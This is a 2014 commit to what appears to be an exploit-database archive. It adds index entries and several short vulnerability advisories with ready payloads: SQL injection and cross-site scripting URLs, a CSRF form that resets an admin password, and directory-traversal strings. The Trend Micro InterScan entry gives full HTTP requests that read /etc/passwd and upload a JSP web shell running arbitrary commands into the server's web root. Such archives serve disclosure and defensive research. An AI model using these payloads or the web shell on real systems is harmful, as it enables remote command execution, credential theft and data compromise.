Updated 07_29_2014

2014-07-29 04:42:24 +00:00 · 2014-07-29 04:42:24 +00:00 · b26c6e67fd
commit b26c6e67fd
parent bf90c0d5c0
11 changed files with 330 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -30779,7 +30779,16 @@ id,file,description,date,author,platform,type,port
 34170,platforms/php/webapps/34170.txt,"ZeroCMS 1.0 - Persistent Cross-Site Scripting Vulnerability",2014-07-27,"Mayuresh Dani",php,webapps,0
 34172,platforms/hardware/webapps/34172.txt,"Sagem Fast 3304-V1 - Denial Of Service Vulnerability",2014-07-27,Z3ro0ne,hardware,webapps,0
 34173,platforms/php/webapps/34173.txt,"DirPHP 1.0 - LFI Vulnerability",2014-07-27,"black hat",php,webapps,0
+34174,platforms/windows/remote/34174.txt,"Enemy Territory: Quake Wars 1.5.12642.33243 - Buffer Overflow Vulnerability",2010-08-18,"Luigi Auriemma",windows,remote,0
 34175,platforms/php/webapps/34175.txt,"SaffaTunes CMS 'news.php' Multiple SQL Injection Vulnerabilities",2010-06-21,"Th3 RDX",php,webapps,0
 34176,platforms/php/webapps/34176.html,"osCmax 2.0 'articles.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
 34177,platforms/php/webapps/34177.txt,"Sigmer Technologies Scribe CMS 'copy_folder.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34178,platforms/windows/remote/34178.txt,"id Software id Tech 4 Engine - 'idGameLocal::GetGameStateObject()' Remote Code Execution Vulnerability",2010-07-21,"Luigi Auriemma",windows,remote,0
 34179,platforms/jsp/webapps/34179.txt,"IBM WebSphere ILOG JRules 6.7 Cross Site Scripting Vulnerability",2010-06-21,IBM,jsp,webapps,0
+34180,platforms/asp/webapps/34180.txt,"webConductor 'default.asp' SQL Injection Vulnerability",2010-06-22,"Th3 RDX",asp,webapps,0
+34181,platforms/php/webapps/34181.txt,"SoftComplex PHP Event Calendar 1.5 Multiple Remote Vulnerabilities",2010-06-22,"cp77fk4r ",php,webapps,0
+34182,platforms/hardware/remote/34182.txt,"Linksys WAP54Gv3 Wireless Router 'debug.cgi' Cross-Site Scripting Vulnerability",2010-06-23,"Cristofaro Mune",hardware,remote,0
+34183,platforms/php/webapps/34183.txt,"Jamroom 4.0.2/4.1.x 'forum.php' Cross Site Scripting Vulnerability",2010-06-21,"High-Tech Bridge SA",php,webapps,0
+34184,platforms/hardware/remote/34184.txt,"Trend Micro InterScan Web Security Virtual Appliance Multiple Vulnerabilities",2010-06-14,"Ivan Huertas",hardware,remote,0
+34185,platforms/php/webapps/34185.txt,"Pre Projects Multi-Vendor Shopping Malls 'products.php' SQL Injection Vulnerability",2010-06-23,CoBRa_21,php,webapps,0
+34186,platforms/multiple/remote/34186.txt,"Apache Axis2 1.x '/axis2/axis2-admin' Session Fixation Vulnerability",2010-06-23,"Tiago Ferreira Barbosa",multiple,remote,0
--- a/platforms/asp/webapps/34180.txt
+++ b/platforms/asp/webapps/34180.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41042/info
+
+webConductor is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/cs-cms/default.asp?id=70+and+1=0+ Union 2,3,4,5,6,7,8,9,10 (tables & column) 
--- a/platforms/hardware/remote/34182.txt
+++ b/platforms/hardware/remote/34182.txt
@ -0,0 +1,16 @@
+source: http://www.securityfocus.com/bid/41061/info
+
+Linksys WAP54Gv3 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+Attackers may exploit this issue by enticing victims into visiting a malicious site.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+The following firmware versions are vulnerable:
+
+3.05.03 (Europe)
+3.04.03 (US) 
+
+The following example input to the vulnerable parameter is available:
+
+echo "&lt;/textarea&gt;<script>alert('XSS');</script>" 
--- a/platforms/hardware/remote/34184.txt
+++ b/platforms/hardware/remote/34184.txt
@ -0,0 +1,219 @@
+source: http://www.securityfocus.com/bid/41072/info
+
+Trend Micro InterScan Web Security Virtual Appliance is prone to multiple vulnerabilities.
+
+Exploiting these issues can allow an attacker to download or upload arbitrary files to the system. This may aid in further attacks.
+
+Firmware versions prior to Trend Micro InterScan Web Security Virtual Appliance Critical Build 1386 are vulnerable.
+
+==============================download==============================
+
+POST /servlet/com.trend.iwss.gui.servlet.exportreport HTTP/1.1
+
+Host: xxx.xxx.xx.xx:1812
+
+User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+Accept-Language: en-us,en;q=0.5
+
+Accept-Encoding: gzip,deflate
+
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+
+Keep-Alive: 300
+
+Proxy-Connection: keep-alive
+
+Referer: http://xxx.xxx.xx.xx:1812/summary_threat.jsp
+
+Cookie: JSESSIONID=D122F55EA4D2A5FA1E7AE4582085F370
+
+Content-Type: application/x-www-form-urlencoded
+
+Content-Length: 99
+
+ 
+
+op=refresh&summaryinterval=7&exportname=../../../../../../../../../../etc/passwd&exportfilesize=443
+
+
+
+==============================upload==============================
+
+POST /servlet/com.trend.iwss.gui.servlet.XMLRPCcert?action=import HTTP/1.1
+
+Host: xx.xx.xx.xx:1812
+
+User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100214 Ubuntu/9.10 (karmic) Firefox/3.5.8
+
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+
+Accept-Language: en-us,en;q=0.5
+
+Accept-Encoding: gzip,deflate
+
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+
+Keep-Alive: 300
+
+Proxy-Connection: keep-alive
+
+Referer: http://xx.xx.xx.xx:1812 
+
+Cookie: JSESSIONID=9072F5BC86BD450CFD8B88613FFD2F80
+
+Content-Type: multipart/form-data; boundary=---------------------------80377104394420410598722900
+
+Content-Length: 2912
+
+ 
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="op"
+
+save
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="defaultca"
+
+yes
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="importca_certificate"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
+
+ 
+
+Content-Type: application/octet-stream
+
+ 
+
+<%@ page import="java.util.*,java.io.*"%>
+
+<%%>
+
+<HTML><BODY>
+
+<FORM METHOD="GET" NAME="myform" ACTION="">
+
+<INPUT TYPE="text" NAME="cmd">
+
+<INPUT TYPE="submit" VALUE="Send">
+
+</FORM>
+
+<pre>
+
+<%
+
+if (request.getParameter("cmd") != null) {
+
+        out.println("Command: " + request.getParameter("cmd") + "<BR>");
+
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+
+        OutputStream os = p.getOutputStream();
+
+        InputStream in = p.getInputStream();
+
+        DataInputStream dis = new DataInputStream(in);
+
+        String disr = dis.readLine();
+
+        while ( disr != null ) {
+
+                out.println(disr); 
+
+                disr = dis.readLine(); 
+
+                }
+
+        }
+
+%>
+
+</pre>
+
+</BODY></HTML>
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="importca_key"; filename="../../../../../../../../../../../../../../../../../usr/iwss/AdminUI/tomcat/webapps/ROOT/cmd.jsp"
+
+ 
+
+<%@ page import="java.util.*,java.io.*"%>
+
+<%%>
+
+<HTML><BODY>
+
+<FORM METHOD="GET" NAME="myform" ACTION="">
+
+<INPUT TYPE="text" NAME="cmd">
+
+<INPUT TYPE="submit" VALUE="Send">
+
+</FORM>
+
+<pre>
+
+<%
+
+if (request.getParameter("cmd") != null) {
+
+        out.println("Command: " + request.getParameter("cmd") + "<BR>");
+
+        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
+
+        OutputStream os = p.getOutputStream();
+
+        InputStream in = p.getInputStream();
+
+        DataInputStream dis = new DataInputStream(in);
+
+        String disr = dis.readLine();
+
+        while ( disr != null ) {
+
+                out.println(disr); 
+
+                disr = dis.readLine(); 
+
+                }
+
+        }
+
+%>
+
+</pre>
+
+</BODY></HTML>
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="importca_passphrase"
+
+ 
+
+test
+
+ 
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="importca_2passphrase"
+
+test
+
+-----------------------------80377104394420410598722900
+
+Content-Disposition: form-data; name="beErrMsg"
+
+imperr
+
+-----------------------------80377104394420410598722900--
--- a/platforms/multiple/remote/34186.txt
+++ b/platforms/multiple/remote/34186.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41076/info
+
+Apache Axis2 is prone to a session-fixation vulnerability.
+
+Attackers can exploit this issue to hijack a user's session and gain unauthorized access to the affected application.
+
+Apache Axis2 1.5 is vulnerable; other versions may also be affected. 
+
+http://www.example.com:8080/axis2/axis2-admin/engagingglobally?submit=%2bEngage 2b&modules= 
--- a/platforms/php/webapps/34181.txt
+++ b/platforms/php/webapps/34181.txt
@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/41043/info
+
+SoftComplex PHP Event Calendar is prone to multiple remote security vulnerabilities including cross-site scripting, HTML-injection, directory-traversal, and cross-site request-forgery issues.
+
+Attackers can exploit these issues to obtain sensitive information, upload arbitrary files, execute arbitrary script code, steal cookie-based authentication credentials, and perform certain administrative actions.
+
+PHP Event Calendar 1.5 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[DIR]/cl_files/index.php (POST/Login name)
+http://www.example.com/[DIR]/cl_files/index.php?page=a&name=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=list&action=t&page=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/[DIR]/cl_files/index.php?CLd=21&CLm=06&CLy=2010&name=[CALENDAR_NAME]&type=&action=e&err=&#039;%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C&#039;
+http://www.example.com/[DIR]/cl_files/index.php?CLd=23&CLm=06&CLy=2010%22%3E%3Cscript%3Ealert(1)%3C/script%3E&name=[CALENDAR_NAME]&type=&action=e
+
+http://www.example.com/[DIR]/cl_files/index.php?page=e
+(Title; Body; Background color; Background image; Align;)
+
+http://www.example.com/[DIR]/cl_files/index.php?page=a
+Change "Admin" Password PoC:
+<form name=user method=post action="http://www.example.com/[DIR]/cl_files/index.php?page=a&name=[CALENDAR_NAME]">
+<input type="hidden" name="page" value="a">
+<input type=hidden value="admin" name=l class=inpt>
+<input type=hidden value="1234" name=p class=inpt>
+<input type=hidden value="1234" name=p2 class=inpt>
+</form>
+
+http://www.example.com/[DIR]/cl_files/index.php
+"Title:" \..\..\..\..\..\..\1.txt%00
--- a/platforms/php/webapps/34183.txt
+++ b/platforms/php/webapps/34183.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/41071/info
+
+Jamroom is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Jamroom versions prior to 4.1.9 are vulnerable. 
+
+http://www.example.com/forum.php?mode=modify&band_id=0&t=<T>&c=<C>&post_id=<POST_ID>%00%27%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E 
--- a/platforms/php/webapps/34185.txt
+++ b/platforms/php/webapps/34185.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/41074/info
+
+Pre Multi-Vendor Shopping Malls is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/[path]/products.php?sid=1 (SQL) 
--- a/platforms/windows/dos/34162.py
+++ b/platforms/windows/dos/34162.py
@ -53,3 +53,5 @@ except:

 print('[+] Use the following as Server Name/IP with any user\'s credentials!')
 print(sploit.decode())
+
+##EDB Note: You can also enter the contents of the file in the "Enter URL" to cause this crash.
--- a/platforms/windows/remote/34174.txt
+++ b/platforms/windows/remote/34174.txt
@ -0,0 +1,9 @@
+source! http://www.securityfocus.com/bid/40991/info
+
+Enemy Territory: Quake Wars is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will likely cause denial-of-service conditions.
+
+Enemy Territory: Quake Wars 1.5.12642.33243 is vulnerable; other versions may also be affected. 
+
+http://www.exploit-db.com/sploits/34174.zip
--- a/platforms/windows/remote/34178.txt
+++ b/platforms/windows/remote/34178.txt
@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/41001/info
+
+id Tech 4 Engine is prone to a remote code-execution vulnerability.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+The following applications include the vulnerable engine:
+
+Enemy Territory: Quake Wars 1.5.12642.33243 and prior
+Wolfenstein 1.3.344272 and prior
+Quake 4 1.4.2 and prior
+Doom 3 1.3.1 and prior
+Prey 1.4 and prior 
+
+http://www.exploit-db.com/sploits/34178.zip